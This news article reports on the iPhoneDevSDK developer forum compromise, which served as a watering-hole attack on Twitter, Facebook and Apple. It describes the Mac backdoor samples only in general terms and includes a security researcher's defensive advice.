Many companies likely affected by iOS developer forum compromise
It is very likely that iPhoneDevSDK was the common gateway for the attacks against Twitter, Facebook and Apple, Sean Sullivan, a researcher at security firm F-Secure, said Wednesday via email.
Sullivan believes that while it's possible the attackers did their homework and researched in advance who visited the forum, it's also possible that they never expected to hack into Twitter, Facebook and Apple systems in particular. "In fact, that might have been their undoing -- they caught too many big fish with strong security teams," he said.
Twitter did not immediately respond to an inquiry sent Wednesday seeking confirmation that the attack against the company involved a previously unknown Java exploit hosted on iPhoneDevSDK.
The exact timeline of the attack against the Web forum is not clear, but it seems that the hackers removed the exploit on Jan. 30, Sefferman said.
Earlier this week, Sullivan said in a blog post that F-Secure obtained some samples of Mac malware uploaded to VirusTotal on Jan. 31, one day before Twitter's hack announcement, that might have been used in the attacks.
One of the samples was a backdoored SSH daemon binary that was very likely dropped by an exploit. The others were one-line Perl scripts that run at startup and open a reverse shell to a remote server, he said.
The URLs contacted by these scripts included a domain that misspelled "Apple Corp"; a domain that sounded like the name of a digital consulting company; and a domain that pretends to be a cloud storage service.
Given the audience of iPhoneDevSDK -- iOS developers -- the attack most likely targeted Mac OS users, Sullivan said Wednesday. However, some old samples of Windows malware that contact one of the same domains as the new Mac backdoors have also been identified. So the same attackers also targeted Windows users in the past, he said.
This type of attack that involves infecting a website frequently visited by a targeted group of people -- for instance, employees of companies in a certain industry, political and human rights activists supporting a certain cause -- is referred to in the security community as a "watering hole" attack, because the method resembles the hunting habits of predatory animals who wait near pools of water for prey to come and drink.
Sefferman described iPhoneDevSDK as "the most widely read dedicated iOS developer forum." The site does not publicly list the exact number of registered users, but it has sub-forums dedicated to certain topics that have tens or hundreds of thousands of replies.
Sullivan believes that, given the popularity of iPhoneDevSDK, many other companies were probably affected by this attack as well, but have yet to come forward or even discover the malware on their employees' systems.
Companies who develop iOS apps should probably ask their employees if they visited iPhoneDevSDK in recent months and should analyze their work computers for malware.
- 15 Non-Certified IT Skills Growing in Demand
- How 19 Tech Titans Target Healthcare
- Twitter Suffering From Growing Pains (and Facebook Comparisons)
- Agile Comes to Data Integration
- Slideshow: 7 security mistakes people make with their mobile device
- iOS vs. Android: Which is more secure?
- 11 sure signs you've been hacked
- Who's Spying on You? You're aware of the threats of malware to your business but what about the ever-changing ground rules? Cybercriminals today are launching attacks against...
- Is Your Big Data Solution Production-Ready? Read "Is Your Big Data Solution Production-Ready?" now, and discover best practices and actionable steps to implementing a production-ready big data solution.
- Pay-as-you-Grow Data Protection: IBM Tivoli's Full-featured Data Protection Suite for Small to Medium Businesses IBM Tivoli Storage Manager Suite for Unified Recovery gives small and medium businesses the opportunity to start out with only the individual solutions...
- Streamline Data Protection with IBM Tivoli Storage Manager Operations Center IBM Tivoli Storage Manager (TSM) has been an industry-standard data protection solution for two decades. But, where most competitors focus exclusively on Backup...
- Webinar: Building a Big Data solution that's production-ready Big data solutions are no longer just a nice-to-have.
- Meg Whitman presents Unlocking IT with Big Data During this Web Event you will hear Meg Whitman, President and CEO, HP discuss HAVEn - the #1 Big Data platform, as well... All Cybercrime and Hacking White Papers | Webcasts